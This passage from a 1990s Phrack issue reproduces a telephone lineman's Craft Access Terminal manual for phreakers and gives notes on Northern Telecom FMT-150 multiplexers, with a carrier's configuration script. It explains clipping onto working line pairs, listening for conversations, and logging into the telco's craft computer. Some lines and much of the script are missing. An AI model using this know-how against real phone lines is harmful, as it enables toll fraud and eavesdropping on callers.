2290 IF (Z AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
2300 NEXT
2310 GOSUB 2010
2320 DOUT=0:CLK=0:GOSUB 1970
2330 DOUT=0:CLK=1:GOSUB 1970 ' Stop bit
2340 DOUT=1:CLK=1:GOSUB 1970
2350 PRINT USING "###% programmed";100*J/MAX
2360 PRINT STRING$(80*J/MAX,46)
2380 GOSUB 1970
2390 IF DIN=0 GOTO 2380
2400 NEXT
2410 RELAY=0:DOUT=1:CLK=1:GOSUB 1970
2430 'This is the end in case you though the code was truncated somehow...


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 8 of 18

    .:::::  :::::.  .::::.  .::::: ::::::
    ::      ::  ::  ::  ::  ::       ::                          
    ::      ::  ::  ::  ::  ::       ::                          
    ::      :::::'  ::::::  :::::    ::                          
    ::      :::::.  ::  ::  ::       ::
    `:::::  ::  ::  ::  ::  ::       ::

    .::::.  .:::::  .:::::  .:::::  .:::::  .:::::
    ::  ::  ::      ::      ::      ::      ::
    ::  ::  ::      ::      ::::    `::::.  `::::.
    ::::::  ::      ::      ::          ::      ::
    ::  ::  ::      ::      ::          ::      ::
    ::  ::  `:::::  `:::::  `:::::  :::::'  :::::'

    ::::::  .:::::  .::::.  .::::::.  ::  .:::: ::  .::::.  ::
      ::    ::      ::  ::  :: :: ::  ::  :: :: ::  ::  ::  ::
      ::    ::::    ::  ::  ::    ::  ::  :: :: ::  ::  ::  ::
      ::    ::      :::::'  ::    ::  ::  :: :: ::  ::::::  ::
      ::    ::      ::::.   ::    ::  ::  :: :: ::  ::  ::  ::
      ::    `:::::  ::  ::  ::    ::  ::  :: `::::  ::  ::  `::::


                     Written by Boss Hogg

Greets: Voyager/Splatter/Mr.Hyde/Misfit/Darkseed/][avok/Paradyne
        Ethereal Gloom/Surgat/GOL/Carnage/Kamakize/Seeker/Stravis
        + all others with weird thoughts and ideas.

        The craft.

        Although its called a Craft Access Terminal, the craft hardly
represents a standard computer terminal. It is in actually a lineman's
handset with a built in terminal and 1200 baud modem. The unit looks
like a handset on steroids measuring 12.5" in length. The ones in our
particular area were bright yellow and looks like a rejected Sesame
Street prop. We have reports that they also made them in a blue color as
well though we have yet to see one in use in our area.

        The unit features a 4 line x 16 character LCD display, and a
joystick with a plunger on the top. You will find a diagram of the unit
with descriptions in brackets.

        These units are possibly being phased out in a few areas and
have been found at telco auctions as well as from surplus stores. They
could be replacing these yellow units with the blue units (Which have
the same basic descriptions yet are newer. The crafts we have found were
severely worn). We have also heard they were being replaced with a
Access-2 terminal (rumored to represent a HP-95lx palmtop; Fold open,
larger LCD screen).

        This is essentially the entire uncopywritten manual to the
terminal. The unit can be somewhat confusing at first due to a somewhat
weird menu layout.

Also, to avoid confusion:

 - The page numbers are located at the bottom of the pages. You may wish
to add pagefeeds and space out the page numbers to the bottom of the
page if you want to print it out and stick it in your phreakers binder
or whatever.... The line is meant for the top of each page... As there
is a line at the top in the real manual.

----Here begins the Craft Access Terminal Instruction Manual----


                       Craft Access Terminal

                        Instruction Manual



        Table of Contents
          Features                     : 2
          Using the pointer            : 4
          Battery Pack                 : 6
          Connecting to a working pair : 8
          Making a telephone call      : 9
          Calling a computer           : 12
          Working with a computer      : 15
          Getting help                 : 15
          Making or canceling a
           selection on a screen       : 17
          Reading stored information   : 19
          Filling in information       : 20
          Taking care of your terminal : 25


        Getting Started

        Two battery packs, a charger and a short charger adaptor cord
        should be in the box with the Craft Access Terminal. Before
        using the Craft Access Terminal, insert a battery pack. The
        battery pack must be charged before use. For directions on how
        to charge and insert the battery pack, look at the section of
        the instructions called "The Craft Access Terminal's Battery
        Pack." This section begins on page 6.



        Craft Access Terminal Features

         Receiver - Works like any ordinary telephone receiver.
          [points to ear-piece]

         Transmitter - Works like an ordinary telephone transmitter.
          [points to mouthpiece]

         Craft Access Terminal - Identification Number
          [points to sticker underneath the TRANSMITTER]

         Phone Jack - A modular telephone cord can be plugged in here.
          [located on bottom of the handset]

         Recharger Jack - The plug on the recharger cord is inserted into
                          the jack.
          [located on bottom of the handset]

         Connecting Cord - Connects to a working pair to get dial tone for
                           making a call to either a telephone or a computer.
          [extends from bottom of handset]



          Screen - A liquid crystal display shows information
                   or instructions.
           [on top-front of handset. c'mon- you cant miss it!]

          Mode Switch
            Three positions:
                  Talk      -make a phone call
                  Monitor   -listen for conversation
                  Data      -make a computer call
          Moving the switch to monitor will disconnect a call.
           [This switch is located on the right-top side, when the ]
           [LCD screen is facing you                               ]

          Pointer - Used to mark and select actions on the screen and to
                    indicate where you want to enter information.
           [Joystick located under Screen]

          Rechargeable Battery Pack - Provides power for the terminal. The
                                      pack must be recharged every day.

        [This is accessed by removing a cover held in place by a normal ]
        [phillips screw. The compartment is located under the pointer.  ]
        [NOTE: Although there is a 9-volt battery snap, the thing only  ]
        [uses 4 1.2volt nicads... 4 AA batteries work fine... For those ]
        [whose sets didn't come with battery packs                      ]

          Alpha Numeric Keypad - Used to enter letters and numbers on the
            [Uhh- A normal Touch Tone pad... Cant miss it ]



        Using the pointer

                           The pointer allows you to make choices from a
                           screen, show where you want to fill in information,
    B     BACK             read information that is temporarily stored for you
    A                      in the Craft Access Terminal, and get an
 H  C  <   ^   >  N  S     explanation about a screen.
 E  K  <  .-.  >  E  E
 L  S  <  `-'  >  X  N     Remember that you must push the pointer to 
 P  P  <   V   >  T  D     make a choice.
    E    REVIEW            The pointer can be moved along the right side,
                           along the left side, to the top center and bottom
                           center position.
    = joystick direction

.-. =  Joystick

                1. If you want to select from two or more choices on the
                   screen, move the Pointer along the right side until
                   the arrow (>) appears next to the line you want to
                   select and then press the Pointer.



                2. If you want additional information about one of the
                   choices on the screen, move the Pointer along the
                   left side until the question mark (?) appears next to
                   the line where you need HELP and then press the

                3. If you want to go BACK one screen, move the Pointer
                   to the top center position and then press the

                4. If you want to REVIEW information stored in your
                   Craft Access Terminal, move the Pointer to the bottom
                   center position and then press the Pointer.



        The Craft Access Terminal's Battery Pack

         You must charge the terminals battery pack at least once every
          day. It may take up to twelve hours for a full charge if the
          battery pack has run down completely. Also, before the first
          use, each battery pack should be charged for 24 hours.

         To do this, insert the plug at the other end of the cord
          attached to the charger into the socket at the transmitter end
          of the Craft Access Terminal. Plug the charger at the end of
          the cord into an electrical outlet. The red light on the
          charger should be lit if it is charging properly. However, the
          light will not go out if the battery is fully charged. It is
          advisable to keep the extra battery pack charged so you can
          use it if the battery pack in the terminal you're using runs
          down. To charge the spare battery pack, plug the charger
          adapter cord, (the short cord included with the charger) into
          the pack. Plug the other end of the adapter cord into the
          charger, and plug the charger into an electrical outlet.


          The charger should only be used indoors and only for charging
          Craft Access Terminal.

         In the battery pack runs out of power while you are using the
          terminal, the pack can be removed and the charged pack can be
          inserted. To do this, follow these steps:

         1. Open the Battery Pack Compartment
                Loosen the screw to open the battery cover. Do not hold
                down battery compartment cover while loosening the

         2. Remove the Battery Pack
                Lift out battery pack. Unsnap the battery pack from the



         3. Insert the Battery Pack
                Snap the charged battery pack into the connector. 
		Slide the battery pack into the Craft Access Terminal.
                Close the battery cover. Don't forget to tighten
                the screw.

         How Long Will the Craft Access Terminal Stay Charged?

           At normal temperatures, the Craft Access Terminal will
           operate for approximately 12 hours after being charged.

         The Craft Access Terminal can be used in warm or cold
          temperatures. You should keep in mind however, that the
          battery pack will be drained faster in cold weather. At -20
          degrees Fahrenheit, it may last only 8-10 hours.

         The battery pack in the Craft Access Terminal should no be
          charged at temperatures less than 40 degrees Fahrenheit.

         Battery Pack Life

          The battery pack can be charged many times, providing a
          working life of about 5 years. The four digit number stamped
          on the end of the battery is its date of manufacture.



        Connecting to a Working Pair

         Monitor the Line
          Before connecting to a pair, set the switch at the Monitor
          (center) position.

         Connect Cord and Clips
          Attach cord clips to tip and ring. If you hear a conversation,
          select another pair. You should hear dial tone when connected
          to an available working pair.

       * Connect at a standard terminal point whenever possible to avoid
          puncturing the insulation; holes made in insulation by clips
          can lead to later corrosion problems

         Alternately, dial tone can also be obtained by inserting a
          modular cord as shown on page 2. Do not insert line cord to
          modular jack and connect to tip and ring at the same time. It
          will not work.

         Move back to monitor to increase or decrease volume. To
          increase the volume, move the Pointer along the right side
          until the arrow (>) in next to "increase volume" and then
          press the Pointer.

         To decrease the volume, point to the third line, and press.

         If you want to use the terminal to listen for noise on the
          line, point to the second line and press. This puts the
          terminal in the "quiet" mode so that very low levels of noise
          can be detected.

         Notice that the top line on this screen can't be selected. To
          indicate this, the first space on the line contains a bar.

         You can now make an ordinary telephone call be moving the
          switch to Talk (see Making a Telephone Call) or call a
          computer by moving the switch to Data (see Calling a



        Making a Telephone Call

         Move the switch from Monitor to Talk Position

         Monitor the line to be sure it isn't in use. If no one is
          talking on the line, move the switch from Monitor to Talk.

         Telephone Number Entry and Correction

         If the line is good, you will hear a dial tone. You can enter
          the number you want to call through the keypad. If a number is
          already filled in, you can call that number, or, if you want
          to call a different number, erase the number that is on the
          screen by pressing * on the Touch-tone pad, and enter another

        * If the (*) is entered as the first character, it will not
          erase unless another (*) us entered.

         The small flashing bar is called the cursor. The cursor will
          appear where a number must be entered.

         As each digit to the telephone number is filled in, it will
          appear where the cursor was, and the cursor will move one
          space to the right. Enter a pound (#) between digits to
          indicate a 2-second pause in dialing where required (to wait
          for a second dial tone behind a PBX number, for example). For
          a longer pause, press pound (#) several times.



         When the correct phone number is shown, move the Pointer to the
          right side (anywhere along the right side will do) and press.
          If you need to rotary dial, select the last line with the
          Pointer before you press. The Craft Access Terminal will dial
          the number. You can re-dial by moving the Pointer to the right
          side and pressing again.

         The Craft Access Terminal will save the telephone number and it
          will appear the next time the switch is moved to the Talk

         You can listen as the Craft Access Terminal dials the number.
          If you hear a busy signal after dialing is completed, or if no
          one answers the call, disconnect by moving the switch to the
          Monitor position.

         Call in Progress and Volume Control

         When dialing is completed, this screen appears. Use the
          Pointer the increase or decrease the volume of the receiver,
          or to mute the trans mitter to listen only.

         The volume level is indicated by the number of filled spaces on
          the increase volume line. One filled space for minimum volume,
          four for maximum.




         Moving the switch to the Monitor position will end the phone
          call, and this screen will appear.

         Be sure to move the switch to the Monitor position after
          disconnecting. This will conserve battery power as the
          terminal drains the least amount of power in the monitor mode.

         If you are accidentally disconnected, move the switch to the
          Monitor position and start again.



        Calling the Craft Access System Computer

         Move the Switch from Monitor to Data Position.

          Monitor the line to be sure it isn't in use. If no one is
           talking on the line, move the switch from Monitor to Data.

         Telephone Number Entry and Correction

          You can enter the number you want to call through the keypad.
           If a number is already filled in, you can call that number,
           or, if you want to call a different number, erase the number
           on screen by pressing the asterisk (*) on the Touch-tone pad,
           and fill in another number.

          The cursor will appear where a number must be entered.

          Fill in the computer's telephone number if it isn't already
           shown. Put a pound (#) between digits to indicate a 2-second
           pause in dialing where required (to wait for a second dial
           tone behind a PBX number, for example). For a longer pause,
           press pound (#) several times.



          When the correct phone number is shown, move the Pointer to
           the right side (anywhere along the right side will do)and
           press. The Craft Access Terminal will dial the number. You
           can re-dial by moving the Pointer to the right side and
           pressing again.

         Indications that the Call is Successful

          If the call to the Craft Access System computer is successful,
           you will hear a tone on the line. When the Craft Access
           Terminal detects that tone, the tone will stop and a screen
           like this will appear.

          In some cases the call may not be successful. If you retry a
           few times and still have difficulty, try connecting your cord
           to another working pair.

         Password Entry

          Before you send or receive any computer information, you may
           need to fill in a numeric password to identify yourself and a
           number to identify your terminal. Your password can be used
           only with your Craft Access Terminal. Fill in your password
           on the keypad. If you make a mistake press the asterisk (*)
           to erase the password and start over. The cursor will return
           to the place where the password must be filled in.

          The Terminal Identification number is located below the
           transmitter (see page 2).

          When the correct numbers are filled in, move the Pointer to
           the right side (anywhere along the right side will do) and
           press. The Craft Access Terminal will send your password to
           the computer.



         See "Working with the Craft Access System Computer" for further
          instructions about what to do next.


         If your call to a computer is accidentally dis connected, move
          the switch to the Monitor position and repeat from the first
          step to re-dial.

         If you want to disconnect, move the switch to Monitor and this
          screen will appear.



        Working with the Craft Access System Computer

         Each line on a screen is either:

          - information

          - a space in which information can be filled in

          - a choice that can be selected

         This screen is an example. Information can be read on the first
          line, a number is to be entered on the second line, and you
          can make a choice between the last two lines. Lines that don't
          contain selectable choices begin with a bar (I). Those that
          are selectable choices begin with a blank space.


               Getting Help

         To get help about the third line of this screen, move the
          Pointer along the left side until a question mark appears
          beside the third line. When the question mark is beside the
          line, press the Pointer. The help that appears de scribes what
          will happen if you select choice 1.

         To get help about the second line of this screen, a line in
          which information can be filled in, move the Pointer along the
          left side until a question mark (?) appears in the space where
          information is to be filled in and then press.



         This is an example of an explanation. A bar (I) appears to the
          left of every line and there is a page number in the top right
          corner of the screen. This page is numbered 1/2, indicating
          that it is the first page of two pages of information. the
          second page will be numbered 2/2.

         To read the next page of Help, move the Pointer to the right
          side (anywhere along the right side will do) and press.

         If you want to re-read pages, point to REVIEW (move the Pointer
          to the bottom center position and press) to go back one page
          at a time.

         When you are ready to go back to the screen where you
          originally requested help, point to BACK (move the Pointer to
          the top center and press).



        Making or Canceling a Selection on a Screen

         Making a Selection

          When a screen that contains selectable choices is shown, move
           the Pointer along the right side until the arrow (>) is
           beside the choice you want. Then press the Pointer to make
           the selection.

         Some choices make requests of a computer that may take a while.
          If so, a "request in progress" message such as this will



        Canceling a Selection

         If at this point you realize that you've made a wrong choice,
          point to BACK (move the Pointer to the top center and press).
          The screen on which you made the choice will be shown and you
          can make a different choice.

         Some requests cannot be canceled. In this case, only "request
          in progress" is displayed.



        Reading Information Stored in the Craft Access Terminal

         Some of the information sent to you from the computer may be
          stored in the Craft Access Terminal in case you need it again
          later, even if your terminal is disconnected as long as its
          battery pack is charged. If you want to see stored
          information, move the switch to either Monitor or Voice and
          point to REVIEW (move the Pointer to the bottom center and

         A list containing the major categories of information currently
          stored in your Craft Access Terminal will appear on the
          screen. To select a category, move the Pointer along the right
          side until the arrow (>) is beside the category that you want
          to select and then press the Pointer.

         Sometimes an item that you have selected leads to another list.
          Make a selection from this list in the same way you did on the
          previous list. To quit reading, point to BACK (move the
          Pointer to the top center and press). To reread pages of
          stored information, point to REVIEW (move the Pointer to the
          bottom center position) and then press the Pointer.



        Filling in Information on the Craft Access Terminal

         If a screen contains a space where a number can be filled in,
          the cursor will be blinking at the space. If there is already
          a number in the space you may want to change it. If you decide
          to use the number that is already shown, point to NEXT (move
          the Pointer to any position on the right side and press).

         If you want to change the number, press the asterisk (*) to
          erase the wrong number, then fill in the number you want.

         When the desired number is shown, point to NEXT (move the
          Pointer to any position on the right side and press).



         Sometimes you may need to return to a screen to correct an

         When you point to BACK (move the Pointer to the top center and
          press), the cursor will appear at the beginning of the first
          place where information was filled in.

         Press the asterisk (*) on the keypad to erase the entered
          number or make a correction by typing over the incorrect
          number with the correct number.



         If there are several spaces to be filled in on one screen, move
          the Pointer along the right side of the control to point to
          each location where you can enter information. Don't press the
          Pointer until you have filled in all the required information.

         If a space where information can be filled in is preceded with
          an asterisk (*), the information is optional and the space may
          be left without an entry.

         After you have filled in all of the information you need, point
          to NEXT (move the Pointer to any position on the right side
          and press).

         Display of the asterisk is actually controlled by the Craft
          Access System computer. Keep in mind that this can change.



         Sometimes the Craft Access System will allow you to enter the
          letters and punctuation marks to fill in the information that
          is needed. Whenever this is the case, this screen is

        Entering Alphabetical and Numeric Characters

         Letters, numbers and punctuation marks are entered from the
          keypad. All characters you enter appear on the screen.

         Each key is used to enter four different characters as labeled
          on the key; except for the [#] key. The [SP] on the [#] key is
          used to enter a space between two words.

         Two easy methods can be used to enter characters:

         - Method 1: Press and hold down the key with the desired
           character. Look at the display while holding down the key.
           You will see each character labeled on that key appear one
           after the other. When the desired character appears, release
           the key and that character will remain on the screen, and the
           cursor will advance to the next position.

         - Method 2: There is no need to continuously watch the screen
           with this method. Instead of holding down the key you rapidly
           tap the key a number of times equal to the position of the
           desired character on that key.

           For example, tap the [6] key three times to enter [N]; tap
           the [3] key three times to enter [E]; tap the [9] key twice
           to enter [w] and tap the [#] key twice to enter a space.

         A blinking dark block on the screen indicates you have entered
          you last character.



        Erasing a Character, an Entire Line or more.

         If you want to erase a character, push the pointer to the left
          and press once. Holding the pointer down it will continue to
          erase characters one at a time until it is released.

        Sending Your Message to the Computer

         When you are through entering the message, move the pointer to
          the right and press it to send your message. The cursor should
          stop blinking to indicate that your message has been sent.



        Taking Care of Your Terminal

         1. To avoid damaging the Craft Access Terminal

          - Don't drop the terminal. During the work day, the Craft
            Access Terminal should be in the cab of your vehicle or
            clipped to your tool belt when not in use

          - Don't unnecessarily expose the terminal to dust, sand,
            water, or salt air.

         2. Problems Caused by Extreme Temperatures


           The Craft Access Terminal can be damaged by extreme Heat.


           Cold is less likely to damage the terminal. However, the
           screen won't work properly at temperatures less than -20
           degrees Fahrenheit. If you must use your terminal in colder
           temperatures, you can use it for about 20 minutes in the
           cold, then place it somewhere warm for 15 to 30 minutes and
           then use it in the cold again.

         3. Problems Caused by Water, Condensation, and High Humidity.

           Don't expose the terminal to water; especially avoid dropping
           the terminal in water. If it does get wet, dry it immediately.
           The Craft Access Terminal will work in rain or snow, but
           should be wiped dry whenever possible.

         4. How to store the Craft Access Terminal and spare batteries.

           When not in use, the Craft Access Terminal or spare battery
           pack should be connected to the charger.

         5. Under some abnormal conditions, the terminal may lock itself
            into an incorrect state. To "reset" the terminal, simply
            insert the battery charger plug into the charge jack, then
            remove. CAUTION: This will erase any stored information.



        For Quick Reference:

                            : -To quit reading stored information :
                            : -To go back to a screen you saw     :
                            :   previously                        :
                            :        .----------------------------'
                            : BACK   :
  .-----------------------. :        : .---------------------------.
  :                   b   : :   O    : :                           :
  : -To get           a O : `--------' :O n S -to select a choice  :
  :  explanation of H c   :            :                           :
  :  selectable     E k O :            :O e E -to read new page of :
  :  items          L s   : (JOYSTICK) :       help or new page of :
  :                 P p O :            :O x N  stored information  :
  : -To erase a       a   :            :                           :
  :  character or     c O : .--------. :O t D -to send mail        :
  :  line             e   : :   O    : `---------------------------'
  :                       : : REVIEW :
  :  (ALPHA-ENTRY)        : :        `-------------------------.
  :   (MODE ONLY)         : :                                  :
  `-----------------------' :                                  :
                            : -To read information stored in   :
                            :  the Craft Access Terminal       :
                            :                                  :
                            : -To read previous page of help   :
                            :  or store information            :
                            :                                  :


          FCC Regulations for Telephone Equipment
          (you know all this crap)


        (BACK COVER)



        Few last notes:

        The real Craft handsets do not have a power switch, they just
         sit on all of the time. So we could also add a power switch to

        The Craft handset uses a 1200 baud modem, but seems to be
         incompatible with standard modems...


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 9 of 18

		Information about Northern Telecom's FMT-150B/C/D
				Written by StaTiC

        Ok, I know someone wrote an article in Phrack about the
FMT-150B/C/D, but I figured I should write some more.  I am not going to
write the same info that FyberLyte wrote, in fact I recommend you go and
check it out.  It is in Phrack #44-13.  This is some stuff I obtained,
that I figured the rest of the world would be interested in.

Included info: 	Connecting a FMT-150 to a Rockwell OS-35
		Connecting Environmental Alarms to the FMT-150
		Procomm Script to Perform Configuration of FMT-150
		FMT-150 Configuration Checklist 
		Glossary of Terms


                              ROCKWELL OS-35 INPUTS

     A pin block will be provided at the central office location, in the
     bay equipped with FMT-150 equipment.  The pin block will provide
     the termination points for the Rockwell OS-35A and the FMT-150
     customer output alarms. Each pin block will be able to support a
     maximum of 16 FMT-150 systems, see pin block diagram.

     Wiring of the FMT-150 customer outputs points and the OS-35A points
     will be done by the vender on the back of the pin block.

     Once a FMT-150 system has been certified the certification team
     will be responsible for x-connecting the FMT-150 customer output
     alarm points to the appropriate OS-35A points on the front of the
     pin block. Completion of this x-connecting will allow FMT-150
     system alarms originating either from the CO or the RT to be
     transported via the OS-35A back to the Lightwave and Radio Alarm


     The FMT-150 16 customer outputs are defined as follows:

          OUTPUT        ALARM        OUTPUT        ALARM
          ------        -----        ------        -----
            1         BAY MAJOR        9          MI3 ALARM #3
            2         BAY MINOR        10         HSA ALARM
            3         OPT A FAIL       11         HSB ALARM
            4         OPT B FAIL       12         DS1 GRP FAIL
            5         STX TX           13         SYSTEM ID CLLI
            6         STS RX           14         COMM. EQUIP. ALARM
            7         M13 ALARM #1     15         NODE #1 CO
            8         M13 ALARM #2     16         NODE #2 REMOTE

     The Rockwell OS-35A provides a total of 32 separate alarm points.
     The first 16 points with the exception of point 13 have been
     multiplied on the pin block to provide x-connect points for a total
     of 16 FMT-150 systems, see pin block diagram.

     On the pin block x-connect the designated (1 of 16) FMT-150 system
     customer outputs, pins 1-12 and 14-16 to the appropriate OS-35A
     pins 1-12 and 14-16, see pin block diagram.

     Pins 17-32 on the pin block going to the OS-35A will be used for
     x-connecting the customer output #13 from each FMT-150 system.
     Customer output #13 provides the system ID for the FMT-150, see pin
     block diagram.


                        OS-35A    FMT-150 System
                        ------    --------------
                        PIN 17      SYSTEM 1
                        PIN 18      SYSTEM 2
                          :            :
                          :            :
                        PIN 31      SYSTEM 15
                        PIN 32      SYSTEM 16


     After x-connects have been completed on FMT-150 system that has
     been certified, contact the Alarm Center at (313) 223-9688 and
     verify that all 16 customer output alarm conditions at both the CO
     and RT can be activated and are reporting via the OS-35A back to
     the alarm center.

     The Lightwave Alarm Center will monitor the FMT-150 system for a 24
     hour quiet period for alarms.  During this 24 hour period if no
     alarms are detected by the Lightwave Alarm Center, the FMT-150 will
     be considered certified for alarming and ready for continual

     If during the 24 hour quiet period the alarm center receives alarms
     from the FMT-150 system, it will not be certified for continual
     monitoring and it will be the responsibility of the MBT
     Certification Teams to resolve those alarms.


                               THE FMT-150 INPUTS.

     Environmental alarms at remote locations may be connected to the
     FMT-150 customer inputs.  If more than one system exists, these
     alarms should only be connected to the first.  Since many remotes
     will not be equipped with all of these alarms, a checklist has been
     provided on the system acceptance sheets to indicate which have
     been wired.  The alarms provided for are Smoke Detector, Sump Pump,
     Open Door, AC Power Fail, HI-LO Temperature, Rectifier Fail, and
     Battery Float.  These are wired to pins D8 through E9 on the
     FMT-150 backplane.  See Shelf Backplane Detail, attached.

     All Customer Inputs are software connected to Customer Output #12.
     They will also bring in Bay Minor (Output #1) or Bay Major (Output
     #2) as appropriate.  Inputs #1 (Smoke Detector) and #2 (Sump Pump)
     are latching inputs that can only be cleared by accessing the MCU
     with a VT100 terminal.  See Section 321-3211-01, DP 3003, page 2.

     FMT-150 systems using external inputs for environmental alarms and
     which use E2 telemetry rather than the OS-35 MUST be provided with
     type NT7H90XH Maintenance Control Units at both ends.

     External alarm operation and telemetry if equipped, should be
     verified with the Alarm Center during acceptance.

		Procomm Script for Accessing FMT-150B/C/D

;*                                                                    *
;*    FMT150.CMD       Version 5.00        Dec 18, 1990               *
;*    Please Destroy all previous versions of this program!           *
;*                                                                    *
;*    NOTE:  Procomm is a product of Datastorm Technologies           *
;     The  script  FMT150.CMD was written to automatically  perform
;     all  configuration commands for the Northern Telecom  FMT-150
;     fiber  optic multiplexer.   Specifically,  this  script  will
;     complete   over  125  configuration   commands   (performance
;     threshold,  error correction,  and alarm outputs) as outlined
;     in Section 4 of the Michigan Bell Certification Procedure for
;     the   FMT-150.    This  program  is   compatible   with   all
;     certification requirements for FMT-150  MCU NT7H90XA  or  MCU
;     NT7H90XE.
;     Requirements:
;     1)  Toshiba T1000 craft terminal or DOS equivalent.
;     2)  Proper serial cables and adapters.
;     3)  Procomm disk with FMT150.CMD file.
;     Procedure for use:
;     1)  Remove disk from drive, then turn on computer.  When the DOS 
;         prompt appears insert the PROCOMM disk into disk drive.  
;         Enter the command "A:" + <ENTER>.
;     2)  Enter the command "FIXPRN" + <ENTER>.
;     3)  Enter the command "PROCOMM" + <ENTER>.
;     4)  While holding the <ALT> key down, press the <D> key, 
;         and select FMT-150 from the dialing menu.
;     5)  Gain access to MCU as normal (press the <ENTER> key 3 times).
;     6)  Once logged in, reset the MCU to factory default by
;         entering "M"(aintenance) "R"(eset) "*"(all) + <ENTER>.
;         It will take approximately three minutes to reconfigure.
;     7)  Gain access to MCU again as in steps 3) & 4).
;     8)  Select the script by pressing <ALT><F5> keys simultaneously.
;     9)  When prompted for command file enter "FMT150" + <ENTER>.
;     10) Answer questions and away you go!
; HISTORY: Version 4.00 May 15, 1990 by AQW final release version
; HISTORY: Version 4.10 Aug 08, 1990 by JBH mod to use VPRINT to divert
;          printer into a better bit bucket, and to correct callback #.
; HISTORY: Version 4.12 Nov 21, 1990 by EEE to use Customer Inputs
; HISTORY: Version 5.00 Dec 18, 1990 by JBH to update documentation
MESSAGE "            *************************************************"
MESSAGE "            *                                               *"
MESSAGE "            *                                               *"
MESSAGE "            *      VERSION 5.00         DEC 18, 1990        *"
MESSAGE "            *                                               *"
MESSAGE "            *       MICHIGAN BELL TELEPHONE COMPANY         *"
MESSAGE "            *           A DIVISION OF AMERITECH             *"
MESSAGE "            *                                               *"
MESSAGE "            *                                               *"
MESSAGE "            *************************************************"



; note the following statement was superseded in version 4.10 by VPRINT
; following flushes the "RUB" buffer
MESSAGE "Enter CLLI code for LOCATION A (C.O.) using full 8 or 11 characters:"
MESSAGE "Enter CLLI code for LOCATION B (REMOTE) using full 8 or 11 characters:"
MESSAGE "Enter CLLI code for YOUR location using full 8 or 11 characters:"
GET S2 11

MESSAGE "Enter system ID without 'MI', for example ALBNMN-JCSNMN."
GET S8 13
MESSAGE "Enter system number, for example 1201 / T3X."
GET S9 15


MESSAGE "Enter today's date."
MESSAGE "Enter two digit year + <ENTER>"
MESSAGE "Enter two digit month + <ENTER>.  Use 0's if required."
LOCATE 10,58
MESSAGE "Enter two digit day + <ENTER>.  Use 0's if required."
LOCATE 12,56
MESSAGE "Enter time."
MESSAGE "Enter two digit hour + <ENTER>.  Use 0's if required."
MESSAGE "Enter two digit minute + <ENTER>.  Use 0's if required."
LOCATE 10,59


MESSAGE "Please verify the following information."
LOCATE 10,17
LOCATE 12,21
LOCATE 17,44
GET S8 1
     CASE "Y"
          ;DO NOTHING
LOCATE 10,15









;TRANSMIT "CGO12 AS1 M1 1H2 !"
;TRANSMIT "CGO12 AS1 M2 1H2 !"
;TRANSMIT "CGO12 AS1 M3 1H2 !"
;TRANSMIT "CGO12 AS1 M1 1H3 !"
;TRANSMIT "CGO12 AS1 M2 1H3 !"
;TRANSMIT "CGO12 AS1 M3 1H3 !"



;also attach to pt 13 for alarm center ID


     TRANSMIT "CN1 T1 BE!"
     TRANSMIT "CN1 T2 BE!"
     TRANSMIT "CN1 T3 BE!"

     TRANSMIT "CN1 T1 PE!"
     TRANSMIT "CN1 T2 PE!"
     TRANSMIT "CN1 T3 PE!"

     TRANSMIT "CN1 T1 RE!"
     TRANSMIT "CN1 T2 RE!"
     TRANSMIT "CN1 T3 RE!"

     TRANSMIT "CN1 T1 TE!"
     TRANSMIT "CN1 T2 TE!"
     TRANSMIT "CN1 T3 TE!"

     ;SIGNAL DEGRADE 10E-8 NODE 1 DP3158
     TRANSMIT "CN1 T1 S8!" 
     TRANSMIT "CN1 T2 S8!"
     TRANSMIT "CN1 T3 S8!"

     TRANSMIT "CN2 T1 BE!"
     TRANSMIT "CN2 T2 BE!"
     TRANSMIT "CN2 T3 BE!"

     TRANSMIT "CN2 T1 PE!"
     TRANSMIT "CN2 T2 PE!"
     TRANSMIT "CN2 T3 PE!"

     TRANSMIT "CN2 T1 RE!"
     TRANSMIT "CN2 T2 RE!"
     TRANSMIT "CN2 T3 RE!"

     TRANSMIT "CN2 T1 TE!"
     TRANSMIT "CN2 T2 TE!"
     TRANSMIT "CN2 T3 TE!"

     ;SIGNAL DEGRADE 10E-8 NODE 2 DP3158
     TRANSMIT "CN2 T1 S8!" 
     TRANSMIT "CN2 T2 S8!"
     TRANSMIT "CN2 T3 S8!"


LOCATE 10,20
LOCATE 14,17

			Glossary of Terms

4W	Four Wire
ACO	Alarm Cut-Off
ACTV    Active (module -- carrying traffic)
AGC 	Automatic Gain Control
AIS     Alarm Indication Signal -- indicates an alarm upstream
AMI	Alternate Mark Inversion -- a technique by which the polarity of
	alternate pulses is inverted
APD	Avalanche Photo Diode -- used for detecting pulses of light
	at the receive end of an optical fiber
AUD	Audible alarm
BDF	Battery Distribution Frame
BER	Bit Error Rate
BIP	Bit Interleave Parity
BPV	Bipolar Violation -- signal is not alternating as expected
CAMMS   Centralized Access Maintenance and Monitoring System --
        a bay-mounted shelf with push buttons and an luminescent display,
	which is used to control FMT-150 networks, as well as other 
	Northern Telecom transmission equipment
CDP	Centralized Display Panel
CEV	Controlled Environment Vault
CO	Central Office
CPC	Common Product Code -- a Northern Telecom code used to identify
DDD	Direct Distance Dialing
DM-13   Digital Multiplexer which multiplexes between DS-1/1C/2 signals
	and DS-3 signals
DNA	Dynamic Network Architecture
E2A	A serial interface for alarm polling of equipment
FE	Frame Error
FER	Frame Error Rate
FL	Frame Loss
FLC 	Frame Loss Counter
FLS	Frame Loss Seconds
FPD	Future Product to be Developed
Group	A multiplexed signal made up of four DS-1s, two DS-1Cs, or 
	one Ds-2
Hub	An FMT-150 site which branches one 150 Mb/s signal into two or
	three signals, in different directions, without sacrificing 
	OA & M continuity
LBR	Loopback Request
MCU	Maintenance Control Unit
MM	Multimode Optical Fiber
MSB	Most Significant Bit
Muldem  Multiplexer/demultiplexer
NRZ	Non-Return to Zero
OTT	Optical Termination Tray
PEC	Product Engineering Code -- a Norther Telecom code used to identify
	equipment.  The preferred code to be used when ordering Northern
	Telecom equipment.
PER	Parity Error Rate
PES	Parity Error Seconds
RTO	Ready To Order
SCU	Service Channel Unit
SMB	Sub-Miniature BNC type connector
SR	Stuff Request
STX	(Pseudo) Synchronous Transport Signal: First Level at
	49.92  Mb/s (Northern Telecom)
TBOS	Telemetry Byte Oriented System
VIS	Visual Alarm
WDM	Wavelength Division Multiplexing
XOW	Express Orderwire


                              ==Phrack Magazine==

